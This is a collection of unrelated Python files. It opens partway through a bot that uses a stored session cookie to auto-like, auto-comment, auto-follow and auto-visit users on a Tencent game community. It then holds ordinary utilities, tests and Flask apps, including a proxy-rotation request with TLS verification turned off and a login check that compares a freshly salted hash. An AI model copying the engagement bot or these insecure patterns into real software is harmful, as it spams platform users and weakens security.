req = request.Request(base_url,headers=headers)
objHotText = []
try:
response = request.urlopen(req)
responseText = response.read().decode("utf-8")[41:-2]
msg = json.loads(responseText)['jData']['jData']
data_list = json.loads(msg)['data']
for l in data_list['list']:
hotText={}
hotText['momentId'] = l['momentId']
hotText['userId'] = l['userId']
hotText['text'] = l['text']
hotText['name'] = l['name']
objHotText.append(hotText)
return(objHotText)
except Exception as r:
print('获取最新动态未知错误 %s' %(Fore.RED+str(r)))
return(objHotText)
#获取热门话题内容(momentId,userId,text,name)
def getHotText(huatiId):
time.sleep(1)
nowtime = int(time.time() * 1000)
url = "https://apps.game.qq.com/wuxia_cgi/ZoneTranspondCgi/index.php?act=requestTranspond&sMethodPath=/api/moment/topicmomentlist&callback=jQuery17109485360742260489_{}&gameId=10002&userId={}&fromIds=&topicId={}&sortType=1&_={}"
headers = {
'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36',
'Cookie':COOKIE
}
base_url = url.format(nowtime,USERID,huatiId,nowtime)
req = request.Request(base_url,headers=headers)
objHotText = []
try:
response = request.urlopen(req)
responseText = response.read().decode("utf-8")[41:-2]
msg = json.loads(responseText)['jData']['jData']
data_list = json.loads(msg)['data']
for l in data_list['list']:
hotText={}
hotText['momentId'] = l['momentId']
hotText['userId'] = l['userId']
hotText['text'] = l['text']
hotText['name'] = l['name']
objHotText.append(hotText)
return(objHotText)
except Exception as r:
print('获取热门话题内容未知错误 %s' %(Fore.RED+str(r)))
return(objHotText)
#获取热门话题id
def getHuatiId():
time.sleep(1)
url = "https://apps.game.qq.com/wuxia_cgi/ZoneTranspondCgi/index.php?act=requestTranspond&sMethodPath=/api/gethottopiclist&callback=jQuery17100504510865243335_1590662496827&gameId=10002&userId={}&tagId=0&fromIds=0&_=1590662497426"
headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36',
'Cookie':COOKIE
}
base_url = url.format(USERID)
req = request.Request(base_url,headers=headers)
huatiId_list = []
try:
response = request.urlopen(req)
responseTxt = GetMiddleStr(response.read().decode("utf-8"),'(',')')
data_list = json.loads(json.loads(responseTxt)['jData']['jData'])['data']['list']
#只获取大于1000条动态的id
for i in data_list:
if int(i['desc'][:-2]) > 500:
huatiId_list.append(str(i['id']))
return huatiId_list
except Exception as r:
print('获取热门话题id未知错误 %s' %(Fore.RED+str(r)))
return(huatiId_list)
#获取关注我的好友列表
def getBefriends():
time.sleep(1)
nowtime = int(time.time() * 1000)
url = "https://apps.game.qq.com/wuxia_cgi/ZoneTranspondCgi/index.php?act=requestTranspond&sMethodPath=/api/user/friends&callback=jQuery171035700906303473556_{}&uin={}&userId={}&_={}"
headers = {
'User-Agent': 'com.tencent.gamehelper.wuxia/2103030265 (Linux; U; Android 6.0.1; zh_CN; MI 4LTE; Build/MMB29M; Cronet/72.0.3626.96)',
'Accept-Encoding':'gzip, deflate, br',
'Cookie':COOKIE
}
base_url = url.format(nowtime,UIN,USERID,nowtime)
req = request.Request(base_url,headers=headers)
try:
response = request.urlopen(req)
responseText = GetMiddleStr(response.read().decode("utf-8"),'(',');')
msg = json.loads(responseText)['jData']['jData']
data_list = json.loads(msg)['data']['list']
#获取最新10个
for i in range(10):
if (str(data_list[i]['userId'])+" add\n") not in getTxtid():
inputTxtid(str(data_list[i]['userId'])+" add")
doAddfriend(data_list[i]['userId'])
except Exception as r:
print('获取关注我的好友列表未知错误 %s' %(Fore.RED+str(r)))
#关注好友
def doAddfriend(friendUserId):
time.sleep(1)
nowtime = int(time.time() * 1000)
url = "https://apps.game.qq.com/wuxia_cgi/ZoneTranspondCgi/index.php?act=requestTranspond&sMethodPath=/api/user/addfriend&callback=jQuery17108775488098925086_{}&uin={}&userId={}&friendUserId={}&_={}"
headers = {
'User-Agent': 'com.tencent.gamehelper.wuxia/2103030265 (Linux; U; Android 6.0.1; zh_CN; MI 4LTE; Build/MMB29M; Cronet/72.0.3626.96)',
'Accept-Encoding':'gzip, deflate, br',
'Cookie':COOKIE
}
base_url = url.format(nowtime,UIN,USERID,friendUserId,nowtime)
req = request.Request(base_url,headers=headers)
try:
response = request.urlopen(req)
responseText = response.read().decode("utf-8")[41:-2]
returnMsg = json.loads(json.loads(responseText)['jData']['jData'])['returnMsg']
print(returnMsg)
print("-------------关注[{}]-----------异常:{}".format(friendUserId,Fore.RED+returnMsg))
except Exception as r:
print('关注好友未知错误 %s' %(Fore.RED+str(r)))
#获取userid
def getUserId(uin):
nowtime = int(time.time() * 1000)
url = "https://apps.game.qq.com/wuxia_cgi/ZoneTranspondCgi/index.php?act=requestTranspond&sMethodPath=/api/getuserid&callback=jQuery17101425417301713745_{}&uin={}"
headers = {
'User-Agent': 'com.tencent.gamehelper.wuxia/2103030265 (Linux; U; Android 6.0.1; zh_CN; MI 4LTE; Build/MMB29M; Cronet/72.0.3626.96)',
'Accept-Encoding':'gzip, deflate, br',
'Cookie':COOKIE
}
base_url = url.format(nowtime,uin)
req = request.Request(base_url,headers=headers)
try:
response = request.urlopen(req)
responseText = GetMiddleStr(response.read().decode("utf-8"),'(',')')
userid = json.loads(json.loads(responseText)['jData']['jData'])['data']['userId']
return userid
except Exception as r:
print('获取userid未知错误 %s' %(Fore.RED+str(r)))
#获取来访列表
def getBevisits():
time.sleep(1)
nowtime = int(time.time() * 1000)
url = "https://apps.game.qq.com/wuxia_cgi/ZoneTranspondCgi/index.php?act=requestTranspond&sMethodPath=/api/user/getbevisits&callback=jQuery171003770645901213299_1592888857747&uin={}&friendUserId={}&lastIndex=0&_={}"
headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36',
'Cookie':COOKIE
}
base_url = url.format(nowtime,USERID,nowtime)
req = request.Request(base_url,headers=headers)
try:
response = request.urlopen(req)
responseText = GetMiddleStr(response.read().decode("utf-8"),'(',');')
userid_list = json.loads(json.loads(responseText)['jData']['jData'])['data']['list']
for u in userid_list:
#如果userid没有在文档里面
if (u['userId']+" go\n") not in getTxtid():
inputTxtid(u['userId']+" go")
#开始访问
doLookMian(u['userId'])
except Exception as r:
print('获取来访列表未知错误 %s' %(Fore.RED+str(r)))
#说说id输入txt文本
def inputTxtid(momentId):
with open("idlist", 'a',encoding='utf-8') as file_object:
file_object.write(str(momentId)+"\n")
file_object.close()
#获取txt文本的说说id(查看是否为新说说)
def getTxtid():
if not os.path.isfile("idlist"):
fd = open("idlist", mode="w", encoding="utf-8")
fd.close()
f = open('idlist', 'r')
idtxt = f.readlines()
f.close()
return idtxt
f = open('1.txt',mode='r')
COOKIE=f.readlines()[0]
f.close()
UIN = GetMiddleStr(COOKIE,'uin=o',';')
print("UIN:%s"%UIN)
USERID = getUserId(UIN)
print("USERID:%s"%USERID)
myFun()
init(autoreset=True)
while True:
commentText = getNewMoments()
#遍历每条说说
for context in commentText:
#判断该说说是否是新内容
if (context['momentId']+"\n") not in getTxtid():
inputTxtid(context['momentId'])
print("\nmomentId:{}\nuserId:{}\ntext:{}\nname:{}\n".format(context['momentId'],context['userId'],context['text'],context['name']))
doDianzan(context['momentId'])
doPinglun(context['momentId'])
print("===========[%s]==========="%(time.strftime("%Y-%m-%d %H:%M:%S", time.localtime())))
time.sleep(0.2)
#获取关注列表
getBefriends()
#获取来访列表
getBevisits()
#60秒获取一次
time.sleep(60)
|
import json
import argparse
import collections
import datetime
import pathlib
import typing
import yaml
from . import serialize, discover, DateContext
ArtifactLocation = collections.namedtuple(
"ArtifactLocation",
[
"artifact_key",
"artifact",
"publication_key",
"publication",
"collection_key",
"collection",
],
)
def _all_artifacts(universe):
for collection_key, collection in universe.collections.items():
for publication_key, publication in collection.publications.items():
for artifact_key, artifact in publication.artifacts.items():
yield ArtifactLocation(
artifact_key,
artifact,
publication_key,
publication,
collection_key,
collection,
)
class _Never:
def __lt__(self, other):
if not isinstance(other, (datetime.date, _Never)):
return NotImplemented
return False
def __gt__(self, other):
if not isinstance(other, (datetime.date, _Never)):
return NotImplemented
return True
class ReleaseInfo(typing.NamedTuple):
# the sooner of the publication release time and the artifact release time;
# if both are None, so is this
effective_release_time: datetime.datetime
# the smaller of the publication ready and artifact ready
ready: bool
def _release_info(loc):
if loc.artifact.release_time is None:
ert = loc.publication.release_time
elif loc.publication.release_time is None:
ert = loc.artifact.release_time
else:
ert = min(loc.publication.release_time, loc.artifact.release_time)
ready = min(loc.artifact.ready, loc.publication.ready)
return ReleaseInfo(ert, ready)
def _header(message):
return "\u001b[1m" + message + "\u001b[0m"
def _normal(message):
return message
def _body(message):
return "\u001b[2m" + message + "\u001b[0m"
def _warning(message):
return "\u001b[33m" + message + "\u001b[0m"
def _success(message):
return "\u001b[32m" + message + "\u001b[0m"
def _error(message):
return "\u001b[31m" + message + "\u001b[0m"
def _purple(message):
return "\u001b[35m" + message + "\u001b[0m"
def cli(argv=None):
pass
def _rpad(s, total_len):
difference = total_len - len(s)
return s + (" " * difference)
def _lpad(s, total_len):
difference = total_len - len(s)
return (" " * difference) + s
def _days_between(date_x, date_y):
return (date_x - date_y).days
def release_schedule(args):
universe = discover(
args.path, skip_directories=args.skip_directories, template_vars=args.vars
)
# get the release info for every artifact
info = [(loc, _release_info(loc)) for loc in _all_artifacts(universe)]
without_release_time = [x for x in info if x[1].effective_release_time is None]
with_release_time = [x for x in info if x[1].effective_release_time is not None]
if not args.show_not_ready:
with_release_time = [x for x in with_release_time if x[1].ready]
# sort in order of release time
sorted_releases = sorted(
with_release_time, key=lambda x: x[1].effective_release_time
)
by_date = collections.defaultdict(lambda: [])
for time in sorted_releases:
date = time[1].effective_release_time.date()
by_date[date].append(time)
first_date = datetime.date.today()
last_date = sorted_releases[-1][1].effective_release_time.date()
date_cursor = first_date
while date_cursor <= last_date:
releases = by_date[date_cursor]
if date_cursor.weekday() == 0 and not args.skip_empty_days:
print()
print(9 * " ", _body("----------"))
print()
if date_cursor == datetime.date.today():
header = "today"
else:
header = ""
if releases or not args.skip_empty_days:
print(_header(_lpad(header, 9)), end=" ")
print(date_cursor.strftime("%a %b %d").lower())
if date_cursor not in by_date:
date_cursor += datetime.timedelta(days=1)
continue
for loc, (ert, ready) in by_date[date_cursor]:
suffix = ''
missing = not (loc.artifact.workdir / loc.artifact.file).exists()
if not ready:
color = _error
suffix = '(not ready)'
elif missing:
suffix = '(missing)'
color = _purple
elif ert > datetime.datetime.now():
color = _warning
suffix = '(waiting)'
else:
color = _success
suffix = '(released)'
if ert.date() == date_cursor:
print(21 * " ", end="")
print(
str(ert.time()),
_body("::"),
color(loc.collection_key),
_body("/"),
color(loc.publication_key),
_body("/"),
color(loc.artifact_key),
end="",
)
print(f" {suffix}")
date_cursor += datetime.timedelta(days=1)
def _arg_vars_file(s):
try:
name, path = s.split(":")
except ValueError:
raise argparse.ArgumentTypeError(
'Vars file argument must be of form "name:path"'
)
with open(path) as fileobj:
values = yaml.load(fileobj, Loader=yaml.Loader)
return {name: values}
def _configure_release_schedule_cli(subparsers):
release_parser = subparsers.add_parser("release-schedule")
release_parser.set_defaults(cmd=release_schedule)
release_parser.add_argument(
"path", default=pathlib.Path.cwd(), nargs="?", type=pathlib.Path
)
release_parser.add_argument(
"--skip-directories",
type=str,
nargs="+",
help="directories that will be ignored during discovery",
)
release_parser.add_argument(
"--show-not-ready", action="store_true", default=False,
)
release_parser.add_argument(
"--skip-empty-days", action="store_true", default=False,
)
release_parser.add_argument(
"--vars",
type=_arg_vars_file,
default=None,
help="A yaml file whose contents will be available in discovery as template variables.",
)
def cli():
parser = argparse.ArgumentParser()
subparsers = parser.add_subparsers()
_configure_release_schedule_cli(subparsers)
args = parser.parse_args()
args.cmd(args)
|
from core.permissions import BasePеrmission
# permissions that will be used in the project |
import os
from flask import Flask, render_template, json , request
from flaskext.mysql import MySQL
from werkzeug import generate_password_hash, check_password_hash
app = Flask(__name__)
mysql =MySQL()
app.config['MYSQL_DATABASE_USER'] = 'ioanirimia'
app.config['MYSQL_DATABASE_PASSWORD'] = ''
app.config['MYSQL_DATABASE_DB'] = 'catalog'
app.config['MYSQL_DATABASE_HOST'] = 'localhost'
mysql.init_app(app)
conn = mysql.connect()
cursor = conn.cursor()
mysql.init_app(app)
@app.route("/")
def main():
return "hello"
@app.route("/login")
def login():
return render_template('login.html')
@app.route("/index")
def index():
return render_template('index.html')
@app.route("/showSignUp")
def showSignUp():
return render_template('signup.html')
@app.route("/pagCatalog")
def pagCatalog():
return render_template('pag_catalog.html')
@app.route("/intr_Note")
def intr_Note():
return render_template('introducere_note.html')
@app.route('/signIn',methods=['POST'])
def signIn():
# read the posted values from the UI
_name = request.form['username']
_password = request.form['password']
# am pus un comentariu
# validate the received values
if _name and _password:
_hashed_password = generate_password_hash(_password)
cursor.callproc('sp_check_login',(_name,_hashed_password))
data = cursor.fetchall()
print str(data[0][0])
if str(data[0][0]).encode('utf-8') == u'Login fail'.encode('utf-8'):
return json.dumps({'html':'<span>Login fail</span>',
'message':str(data[0][0])})
else:
return json.dumps({'html':'<span>Login success</span>',
'message':str(data[0][0])})
@app.route('/signUp',methods=['POST'])
def signUp():
# read the posted values from the UI
_email = request.form['inputEmail']
_name = request.form['inputName']
_prenume = request.form['inputPrenume']
_password = request.form['inputPassword']
_datanasterii = request.form['inputDataN']
_clasa = request.form['inputClasa']
# validate the received values
if _name and _email and _password:
_hashed_password = generate_password_hash(_password)
print len(_hashed_password), _hashed_password
cursor.callproc('sp_createUser',(_name,_email,_hashed_password, _prenume, _datanasterii, _clasa))
data = cursor.fetchall()
if len(data) is 0: # daca s-a inserat utilizator
conn.commit()
return json.dumps({'html':'<span>Toate campurile sunt completate</span>',
'message':'User created successfully !'})
else:
return json.dumps({'error':str(data[0])})
else:
return json.dumps({'html':'<span>Completati campurile lipsa</span>'})
@app.route('/loadTable',methods=['GET'])
def loadTable():
user_username = request.args.get('user_username')
cursor.callproc('sp_getNote',(user_username,))
data = cursor.fetchall()
print data
dictionar = {'html':''}
for i in range(len(data)):
dictionar['html'] += '<tr> ' + \
'<th> '+ data[i][0] +' </th>' + \
'<th>'+ data[i][1] +' </th>' + \
'<th> '+ data[i][2] +' </th>' + \
'<th> '+ str(data[i][3]) +' </th>' + \
'<th> '+ str(data[i][4]) +' </th>' + \
'<th> 7.3 </th>' + \
' </tr>'
return json.dumps(dictionar)
app.run(host=os.getenv('IP', '0.0.0.0'), port=int(os.getenv('PORT', 8080)))
if __name__ == "__main__":
app.run() |
# -*- coding: utf-8 -*-
class Solution:
def containsDuplicate(self, nums):
seen = set()
for num in nums:
if num in seen:
return True
seen.add(num)
return False
if __name__ == "__main__":
solution = Solution()
assert solution.containsDuplicate([1, 2, 3, 1])
assert not solution.containsDuplicate([1, 2, 3, 4])
assert solution.containsDuplicate([1, 1, 1, 3, 3, 4, 3, 2, 4, 2])
|
import requests
from proxypool.setting import TEST_URL
PROXY_POOL_URL = 'http://localhost:5555/random'
headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36"}
def get_proxy():
try:
response = requests.get(PROXY_POOL_URL)
if response.status_code == 200:
return response.text
except ConnectionError:
return None
proxy = get_proxy()
print(proxy)
proxies = {
'http': 'http://' + proxy,
'https': 'https://' + proxy,
}
print(TEST_URL)
response = requests.get(TEST_URL, headers=headers, proxies=proxies, verify=False)
if response.status_code == 200:
print('Successfully')
print(response.text) |
import unittest, os
import numpy as np
from molecules import Cluster, Property, Water, Rotator
from use_generator import Generator
from template import Template
FILE = os.path.join( os.path.dirname(__file__), 'tip3p44_10qm.mol' )
class WaterTest( unittest.TestCase ):
def setUp(self):
self.c = Cluster.get_water_cluster(
FILE,
in_AA = False,
out_AA = False,
N_waters = 10)
def test_beta_rotation(self):
"""reference beta is for a tip3p rotated 1.57 radians round z axis"""
bxxz = -2.2760
byyz = -14.409
bzzz = -5.851
#w = Generator().get_mol( [0,0,0] )
v = np.zeros( (3,3,3))
# This is the vectors when alligned in x-z plane, switched xxz and yyz components
v[0,0,2] = byyz
v[1,1,2] = bxxz
v[2,2,2] = bzzz
vnew = Rotator.transform_3( v, np.pi/2, 0,0 )
self.eq( vnew[0,0,2], bxxz )
self.eq( vnew[1,1,2], byyz )
self.eq( vnew[2,2,2], bzzz )
def test_size(self):
c = Cluster.get_water_cluster(
FILE,
in_AA = False,
out_AA = False,
N_waters = 10)
# Read in distributed properties, transform to atomic sites from waters euler angles
for wat in c:
t1, t2, t3 = wat.get_euler()
kwargs_dict = Template().get( *("TIP3P", "HF", "ANOPVDZ",
True , "0.0" ))
for at in wat:
Property.add_prop_from_template( at, kwargs_dict )
at.Property.transform_ut_properties( t1, t2 ,t3)
# Read in the properties for the oxygen atom, the projected dipole vector should
# be the same
for wat in c:
q = np.zeros( (1, ) )
d = np.zeros( (3, ) )
a = np.zeros( (3,3, ) )
b = np.zeros( (3,3,3, ) )
for at in wat:
q += at.Property["charge"]
d += at.Property["dipole"] + at.Property["charge"] * (at.r-wat.coc)
a += Rotator.ut_2_square( at.Property["alpha"] )
b += Rotator.ut_3_square( at.Property["beta"] )
kwargs_dict = Template().get( *("TIP3P", "HF", "ANOPVDZ",
False , "0.0" ))
d_ref = kwargs_dict[('O1','dipole')]
b_ref = Rotator.ut_3_square( kwargs_dict[('O1','beta')] )
self.eq( q, 0.0 )
self.eq( np.dot( np.einsum('iij->j',b), d)/np.linalg.norm(d),
np.dot( np.einsum('iij->j',b_ref),d_ref)/np.linalg.norm(d_ref),
decimal = 4)
def test_tensor_to_ut(self):
t = np.zeros( (3, 6) )
self.eq( t, np.zeros( ( 3, 6, )) )
#xxx component
t[0,0] = -3.0
#yyy component
t[1,3] = 0.25
#zzz component
t[2,5] = 5.0
#xxy component
t[0,1] = 3.5
t[1,0] = 4.5
#xxz component
t[0,2] = 2.0
t[2,0] = 3.0
#xyy component
t[0,3] = -2.0
#xyz component
t[0,4] = 1.0
t[1,2] = 3.0
t[2,1] = 8.0
t[1,1] = 2.0
#xzz component
t[0,5] = 2.0
t[2,2] = -1.0
#yyz component
t[1,4] = 3.5
t[2,3] = 7.5
#yzz component
t[1,5] = -4.0
t[2,4] = -6.0
# AFTER TRANSFORMAATION
square = Rotator.tensor_to_ut( t )
#xxx, one permutations, -3.0
self.eq( square[0], -3.0 )
#xxy, two permutations, 3.5 and 4.5 should be 3.0
self.eq( square[1], 4.0 )
#xxz, two permutations, 2.0 and 3.0 should be 2.5
self.eq( square[2], 2.5 )
#xyy, two permutations, -2.0 and 2.0 should be 0
self.eq( square[3], 0.0 )
#xyz, three permutations, 1.0 and 3.0 and 8.0 should be 4.0
self.eq( square[4], 4.0 )
#xzz, two permutations, 2.0 and -1.0 should be 0.5
self.eq( square[5], 0.5 )
#yyy, one permutations, 0.25
self.eq( square[6], 0.25 )
#yyz, two permutations, 3.5 and 7.5, should be 5.5
self.eq( square[7], 5.5 )
#yzz, two permutations, -4.0 and -6.0, should be -5.0
self.eq( square[8], -5.0 )
#zzz, one permutations, 5.0
self.eq( square[9], 5.0 )
def test_property_add(self):
p1 = Property()
p1["charge"] = 0.3
p2 = Property()
p2["charge"] = 0.7
assert (p1 + p2)["charge"] == 1.0
def test_property_sub(self):
p1 = Property()
p1["charge"] = 0.3
p2 = Property()
p2["charge"] = 0.7
self.eq( (p2 - p1)["charge"] , 0.4, decimal = 7 )
def eq(self, a, b, decimal = 7):
np.testing.assert_almost_equal( a, b, decimal = decimal )
if __name__ == '__main__':
unittest.main()
|
a = input().split()
a.sort()
m = ''
equals = False
result = ''
for i in range(len(a)):
if i == 0:
m = a[i]
elif a[i] == m:
if i != len(a) - 1:
equals = True
else:
result += a[i]
else:
if equals:
result += m + " "
m = a[i]
equals = False
print(result) |
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
# pylint: disable=C,R,W
import logging
from flask import flash, redirect, url_for, g, request, make_response
from flask_appbuilder import has_access
from flask_babel import lazy_gettext
from flask_mail import Mail, Message
from flask_login import login_user
from flask_appbuilder.views import expose, PublicFormView, ModelView
from flask_appbuilder.security.forms import ResetPasswordForm
from .forms import (
SolarBILoginForm_db,
SolarBIPasswordRecoverForm,
SolarBIPasswordRecoverFormWidget,
SolarBIPasswordResetFormWidget,
SolarBIPasswordResetForm,
SolarBIUserInfoEditForm,
SolarBIIUserInfoEditWidget,
SolarBIResetMyPasswordWidget,
)
from flask_appbuilder._compat import as_unicode
from flask_appbuilder.security.views import AuthDBView, UserInfoEditView, ResetMyPasswordView
log = logging.getLogger(__name__)
class SolarBIAuthDBView(AuthDBView):
invalid_login_message = lazy_gettext("Email/Username or password incorrect. Please try again.")
login_template = "appbuilder/general/security/solarbi_login_db.html"
@expose("/login/", methods=["GET", "POST"])
def login(self):
if g.user is not None and g.user.is_authenticated:
return redirect(self.appbuilder.get_url_for_index)
form = SolarBILoginForm_db()
if form.validate_on_submit():
user = self.appbuilder.sm.auth_user_db(
form.username.data, form.password.data
)
if not user:
flash(as_unicode(self.invalid_login_message), "warning")
return redirect(self.appbuilder.get_url_for_login)
remember = form.remember_me.data
login_user(user, remember=remember)
return redirect(self.appbuilder.get_url_for_index)
return self.render_template(
self.login_template, title=self.title, form=form, appbuilder=self.appbuilder
)
class SolarBIPasswordRecoverView(PublicFormView):
"""
This is the view for recovering password
"""
route_base = '/password-recover'
email_template = 'appbuilder/general/security/password_recover_mail.html'
""" The template used to generate the email sent to the user """
email_subject = lazy_gettext('SolarBI - Reset Your Password')
""" The email subject sent to the user """
message = lazy_gettext('Password reset link sent to your email')
""" The message shown on a successful registration """
error_message = lazy_gettext('This email is not registered or confirmed yet.')
""" The message shown on an unsuccessful registration """
form = SolarBIPasswordRecoverForm
edit_widget = SolarBIPasswordRecoverFormWidget
form_template = 'appbuilder/general/security/recover_password_form_template.html'
def send_email(self, email, hash_val):
"""
Method for sending the registration Email to the user
"""
mail = Mail(self.appbuilder.get_app)
msg = Message()
msg.sender = 'SolarBI', 'chenyang.wang@zawee.work'
msg.subject = self.email_subject
url = url_for('.reset', _external=True, reset_hash=hash_val)
msg.html = self.render_template(self.email_template,
url=url)
msg.recipients = [email]
try:
mail.send(msg)
except Exception as e:
log.error('Send email exception: {0}'.format(str(e)))
return False
return True
def add_password_reset(self, email):
reset_hash = self.appbuilder.sm.add_reset_request(email)
if reset_hash is not None:
flash(as_unicode(self.message), 'info')
self.send_email(email, reset_hash)
return redirect(self.appbuilder.get_url_for_index)
else:
flash(as_unicode(self.error_message), 'danger')
return redirect(self.appbuilder.get_url_for_index)
@expose('/reset/<string:reset_hash>')
def reset(self, reset_hash):
""" This is end point to verify the reset password hash from user
"""
if reset_hash is not None:
return redirect(self.appbuilder.sm.get_url_for_reset(token=reset_hash))
def form_post(self, form):
return self.add_password_reset(email=form.email.data)
class SolarBIResetPasswordView(PublicFormView):
route_base = '/reset'
form = SolarBIPasswordResetForm
form_template = 'appbuilder/general/security/reset_password_form_template.html'
edit_widget = SolarBIPasswordResetFormWidget
redirect_url = '/'
message = lazy_gettext('Password has been reset.')
error_message = lazy_gettext('Sorry, the link has expired.')
@expose('/form', methods=['GET'])
def this_form_get(self):
self._init_vars()
form = self.form.refresh()
token = request.args.get('token')
user = self.appbuilder.sm.find_user_by_token(token)
if user is not None:
self.form_get(form)
widgets = self._get_edit_widget(form=form)
self.update_redirect()
return self.render_template(self.form_template,
title=self.form_title,
widgets=widgets,
appbuilder=self.appbuilder)
flash(as_unicode(self.error_message), 'danger')
return redirect(self.appbuilder.get_url_for_index)
@expose('/form', methods=['POST'])
def this_form_post(self):
self._init_vars()
form = self.form.refresh()
if form.validate_on_submit():
token = request.args.get('token')
response = self.form_post(form, token=token)
if not response:
return self.this_form_get()
return redirect(response)
else:
widgets = self._get_edit_widget(form=form)
return self.render_template(
self.form_template,
title=self.form_title,
widgets=widgets,
appbuilder=self.appbuilder,
)
def form_post(self, form, **kwargs):
token = kwargs['token']
user = self.appbuilder.sm.find_user_by_token(token)
if user is not None:
flash(as_unicode(self.message), 'info')
password = form.password.data
self.appbuilder.sm.reset_password(user.id, password)
self.appbuilder.sm.set_token_used(token)
return self.appbuilder.get_url_for_index
return None
class SolarBIUserInfoEditView(UserInfoEditView):
form_title = 'My Profile - SolarBI'
form = SolarBIUserInfoEditForm
form_template = 'appbuilder/general/security/edit_user_info.html'
edit_widget = SolarBIIUserInfoEditWidget
@expose("/form", methods=["POST"])
@has_access
def this_form_post(self):
self._init_vars()
form = self.form.refresh()
if form.validate_on_submit():
response = self.form_post(form)
if not response:
return redirect("/solarbiuserinfoeditview/form")
return response
else:
widgets = self._get_edit_widget(form=form)
return self.render_template(
self.form_template,
title=self.form_title,
widgets=widgets,
appbuilder=self.appbuilder,
)
class SolarBIResetMyPasswordView(ResetMyPasswordView):
form_template = 'appbuilder/general/security/reset_my_password.html'
edit_widget = SolarBIResetMyPasswordWidget
# class SolarBIUserDBModelView(UserDBModelView):
# # pass
# # route_base = '/solar'
# show_template = 'appbuilder/general/security/my_profile.html'
# show_widget = SolarBIShowWidget
|
import numpy as np
from scipy.special import logsumexp
from optimization.loss import binary_loss_function
## Code adopted from
# https://github.com/riannevdberg/sylvester-flows/blob/master/utils/log_likelihood.py
#calculates the true marginal likelihood by IS
def calculate_likelihood(X, model, args, S=5000, MB=500):
# set auxiliary variables for number of training and test sets
N_test = X.size(0)
X = X.view(-1, *args.input_size)
likelihood_test = []
if S <= MB:
R = 1
else:
R = S // MB
S = MB
for j in range(N_test):
if j % 100 == 0:
print('Progress: {:.2f}%'.format(j / (1. * N_test) * 100))
x_single = X[j].unsqueeze(0)
a = []
for r in range(0, R):
# Repeat it for all training points
x = x_single.expand(S, *x_single.size()[1:]).contiguous()
x_mean, z_mu, z_var, ldj, z0, zk = model(x)
log_vamp_zk = model.log_vamp_zk(zk) if args.vampprior else None
a_tmp, _ , _ = binary_loss_function(x_mean, x, z_mu, z_var, z0, zk, ldj, args.z_size,
args.cuda, summ=False, log_vamp_zk=log_vamp_zk)
a.append(-a_tmp.cpu().data.numpy())
# calculate max
a = np.asarray(a)
a = np.reshape(a, (a.shape[0] * a.shape[1], 1))
likelihood_x = logsumexp(a)
likelihood_test.append(likelihood_x - np.log(len(a)))
likelihood_test = np.array(likelihood_test)
nll = -np.mean(likelihood_test)
return nll
|
#!/usr/bin/python
#contains most of the code for the graph drawing panel
#some display information (whether a vertex is selected, etc.) is contained
#in graph.py
#UI main loop and parent window are started in main.py
import sys
import wx
import math
from cascades import *
from math import sqrt
def control_point(edge, graph):
midpoint = Point()
edge_v = Point()
edge_perp = Point()
midpoint.x = (edge.v1.x + edge.v2.x)/2
midpoint.y = (edge.v1.y + edge.v2.y)/2
edge_v.x, edge_v.y = edge.v1.x - edge.v2.x, edge.v1.y - edge.v2.y
edge_perp.x, edge_perp.y = -1 * float(edge_v.y), float(edge_v.x)
#count the number of vertices on either side of the edge
pos = 0
neg = 0
for vertex in filter(lambda v: not edge.has(v), graph.vertices):
vec = Point()
vec.x, vec.y = vertex.x - midpoint.x, vertex.y - midpoint.y
mat = [[edge_v.x, edge_perp.x],[edge_v.y, edge_perp.y]]
det = mat[0][0] * mat[1][1] - mat[0][1] * mat[1][0]
#product instead of quotient b/c we only care about sign
param = (vec.y * mat[0][0] - vec.x * mat[1][0]) * det
if param > 0:
pos += 1
elif param < 0:
neg += 1
norm = sqrt(edge_perp.x**2 + edge_perp.y**2)
if norm != 0:
edge_perp.x /= norm
edge_perp.y /= norm
#get coordinates for a quadratic bezier curve between the edge.
#the control point is farther from the edge if there are more edges.
#it's placed on the side of the edge that has fewer vertices
sign = 30
if pos > neg:
sign *= -1
c = Point()
c.x = midpoint.x + sign * edge_perp.x * (edge.index - 1)
c.y = midpoint.y + sign * edge_perp.y * (edge.index - 1)
return c
#transform a point in window coords to tikz coords
def tikz_transform(point, origin, scale):
#y-axis is flipped, since +y = down in window coords
return ((point.x - origin.x)/scale, (origin.y - point.y)/scale)
def get_tikz_code(graph):
scale = float(50) #pixels to TikZ coordinates
origin = Point()
#the following isn't super efficient, but whatever
origin.x = min(map(lambda v: v.x, graph.vertices) +
map(lambda e: control_point(e, graph).x, graph.edges))
origin.y = max(map(lambda v: v.y, graph.vertices) +
map(lambda e: control_point(e, graph).y, graph.edges))
output = "\\begin{tikzpicture}\n"
for vertex in graph.vertices:
output += "\\filldraw (%f, %f) circle (3pt);\n"%tikz_transform(vertex, origin, scale)
for edge in graph.edges:
ctrl = control_point(edge, graph)
tikz_tup = (tikz_transform(edge.v1, origin, scale) +
tikz_transform(ctrl, origin, scale) +
tikz_transform(edge.v2, origin, scale))
output += "\draw (%f, %f) .. controls (%f, %f) .. (%f, %f);\n"%tikz_tup
output += "\\end{tikzpicture}\n"
return output
#the graph-drawing panel
class DrawPanel(wx.Panel):
def __init__(self, parent, info_evt):
self.graph = Graph()
self.divisor = Divisor(self.graph)
wx.Panel.__init__(self, parent)
self.newd = wx.TextCtrl(self,-1,"",(0,0), (65,20),wx.TE_PROCESS_ENTER)
self.newd.Hide()
